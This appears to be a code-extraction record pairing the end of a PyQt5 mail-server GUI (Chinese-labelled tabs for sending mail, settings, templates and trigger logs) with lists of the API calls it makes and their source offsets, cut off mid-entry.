QMessageBox.warning(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)
else:
QMessageBox.warning(self, "缺少資料", "請確認是否有資料可以下載", QMessageBox.Ok)
def quit_act(self):
# sender 是发送信号的对象
sender = self.sender()
print(sender.text() + '键被按下')
qApp = QApplication.instance()
qApp.quit()
def main():
app = QApplication(sys.argv)
gui = MailserverUi()
gui.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main() | [
"PyQt5.QtGui.QColor",
"PyQt5.QtWidgets.QApplication",
"copy.deepcopy",
"PyQt5.QtWidgets.QFileDialog.getOpenFileName",
"PyQt5.QtWidgets.QTableWidget",
"PyQt5.QtWidgets.QTextEdit",
"PyQt5.QtWidgets.QFileDialog.getSaveFileName",
"email.generator.Generator",
"PyQt5.QtWidgets.QComboBox",
"PyQt5.QtCore.QDateTime.currentDateTime",
"qdarkstyle.load_stylesheet_pyqt5",
"GenAndSendMail.insert_send_mail",
"PyQt5.QtWidgets.QLabel",
"pandas.DataFrame",
"PyQt5.QtWidgets.QPushButton",
"PyQt5.QtWidgets.QLineEdit",
"PyQt5.QtWidgets.QWidget",
"PyQt5.QtWidgets.QApplication.instance",
"mylibrary.genmail.get_msg",
"PyQt5.QtWebEngineWidgets.QWebEngineView",
"PyQt5.QtWidgets.QMessageBox.information",
"pyqtgraph.setConfigOptions",
"PyQt5.QtWidgets.QGridLayout",
"server.sendmail.Smtp",
"server.client.Client",
"PyQt5.QtWidgets.QTabWidget",
"PyQt5.QtWidgets.QCheckBox",
"mylibrary.genmail.gen_eml",
"pyqtgraph.GraphicsLayoutWidget",
"pyqtgraph.setConfigOption",
"server.database.Database",
"PyQt5.QtWidgets.QMessageBox.warning"
] | [((22731, 22753), 'PyQt5.QtWidgets.QApplication', 'QApplication', (['sys.argv'], {}), '(sys.argv)\n', (22743, 22753), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((986, 999), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (997, 999), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((1196, 1207), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (1205, 1207), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((1298, 1315), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""寄送"""'], {}), "('寄送')\n", (1309, 1315), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((1472, 1512), 'pyqtgraph.setConfigOption', 'setConfigOption', (['"""background"""', '"""#19232D"""'], {}), "('background', '#19232D')\n", (1487, 1512), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((1521, 1555), 'pyqtgraph.setConfigOption', 'setConfigOption', (['"""foreground"""', '"""d"""'], {}), "('foreground', 'd')\n", (1536, 1555), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((1564, 1596), 'pyqtgraph.setConfigOptions', 'setConfigOptions', ([], {'antialias': '(True)'}), '(antialias=True)\n', (1580, 1596), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((2553, 2562), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2560, 2562), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2613, 2626), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (2624, 2626), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2754, 2763), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2761, 2763), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2847, 2860), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (2858, 2860), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((2961, 2970), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2968, 2970), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3056, 3069), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (3067, 3069), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3432, 3451), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""發送信件"""'], {}), "('發送信件')\n", (3443, 3451), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3542, 3561), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""系統設定"""'], {}), "('系統設定')\n", (3553, 3561), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3649, 3669), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""資料庫設定"""'], {}), "('資料庫設定')\n", (3660, 3669), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3761, 3780), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""修改樣板"""'], {}), "('修改樣板')\n", (3772, 3780), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3878, 3901), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""\x08觸發明細"""'], {}), "('\\x08觸發明細')\n", (3889, 3901), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((3993, 4014), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""下載觸發明細"""'], {}), "('下載觸發明細')\n", (4004, 4014), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((4106, 4123), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""退出"""'], {}), "('退出')\n", (4117, 4123), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((4674, 4685), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (4683, 4685), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((4841, 4855), 'PyQt5.QtWidgets.QTableWidget', 'QTableWidget', ([], {}), '()\n', (4853, 4855), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5013, 5035), 'pyqtgraph.GraphicsLayoutWidget', 'GraphicsLayoutWidget', ([], {}), '()\n', (5033, 5035), False, 'from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions\n'), ((5158, 5169), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5167, 5169), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5201, 5212), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5210, 5212), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5243, 5260), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""瀏覽"""'], {}), "('瀏覽')\n", (5254, 5260), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5384, 5395), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5393, 5395), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5430, 5441), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5439, 5441), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5478, 5495), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""瀏覽"""'], {}), "('瀏覽')\n", (5489, 5495), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5625, 5636), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (5634, 5636), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5667, 5684), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""瀏覽"""'], {}), "('瀏覽')\n", (5678, 5684), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((5984, 5999), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', (['"""使用"""'], {}), "('使用')\n", (5993, 5999), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6034, 6051), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""執行"""'], {}), "('執行')\n", (6045, 6051), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6166, 6177), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6175, 6177), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6206, 6217), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6215, 6217), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6246, 6257), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6255, 6257), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6290, 6301), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6299, 6301), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6329, 6344), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', (['"""使用"""'], {}), "('使用')\n", (6338, 6344), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6373, 6384), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6382, 6384), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6414, 6431), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""儲存"""'], {}), "('儲存')\n", (6425, 6431), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6544, 6561), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""測試"""'], {}), "('測試')\n", (6555, 6561), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6670, 6681), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6679, 6681), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6708, 6719), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6717, 6719), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6746, 6757), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6755, 6757), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6788, 6799), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6797, 6799), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6830, 6841), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6839, 6841), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6870, 6881), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (6879, 6881), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((6969, 6986), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""儲存"""'], {}), "('儲存')\n", (6980, 6986), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7124, 7135), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (7133, 7135), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7171, 7182), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (7180, 7182), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7212, 7226), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', (['"""是"""'], {}), "('是')\n", (7221, 7226), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7256, 7267), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (7265, 7267), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7298, 7315), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""瀏覽"""'], {}), "('瀏覽')\n", (7309, 7315), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7436, 7447), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (7445, 7447), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7473, 7485), 'PyQt5.QtWidgets.QTabWidget', 'QTabWidget', ([], {}), '()\n', (7483, 7485), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7618, 7627), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (7625, 7627), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7654, 7663), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (7661, 7663), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7793, 7806), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (7804, 7806), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((7836, 7849), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (7847, 7849), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8065, 8076), 'PyQt5.QtWidgets.QTextEdit', 'QTextEdit', ([], {}), '()\n', (8074, 8076), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8104, 8120), 'PyQt5.QtWebEngineWidgets.QWebEngineView', 'QWebEngineView', ([], {}), '()\n', (8118, 8120), False, 'from PyQt5.QtWebEngineWidgets import QWebEngineView\n'), ((8275, 8292), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""清除"""'], {}), "('清除')\n", (8286, 8292), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8390, 8407), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""讀取"""'], {}), "('讀取')\n", (8401, 8407), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8503, 8520), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""儲存"""'], {}), "('儲存')\n", (8514, 8520), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8629, 8643), 'PyQt5.QtWidgets.QTableWidget', 'QTableWidget', ([], {}), '()\n', (8641, 8643), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8732, 8743), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (8741, 8743), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8772, 8783), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (8781, 8783), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((8868, 8885), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""執行"""'], {}), "('執行')\n", (8879, 8885), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15450, 15518), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Eml Files (*.eml)"""'], {}), "(self, '選取檔案', './', 'Eml Files (*.eml)')\n", (15477, 15518), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15605, 15676), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Excel Files (*.xlsx)"""'], {}), "(self, '選取檔案', './', 'Excel Files (*.xlsx)')\n", (15632, 15676), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15762, 15838), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', '"""./"""', '"""Word Files (*.doc *.docx)"""'], {}), "(self, '選取檔案', './', 'Word Files (*.doc *.docx)')\n", (15789, 15838), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\n'), ((15925, 16011), 'PyQt5.QtWidgets.QFileDialog.getOpenFileName', 'QFileDialog.getOpenFileName', (['self', '"""選取檔案"""', 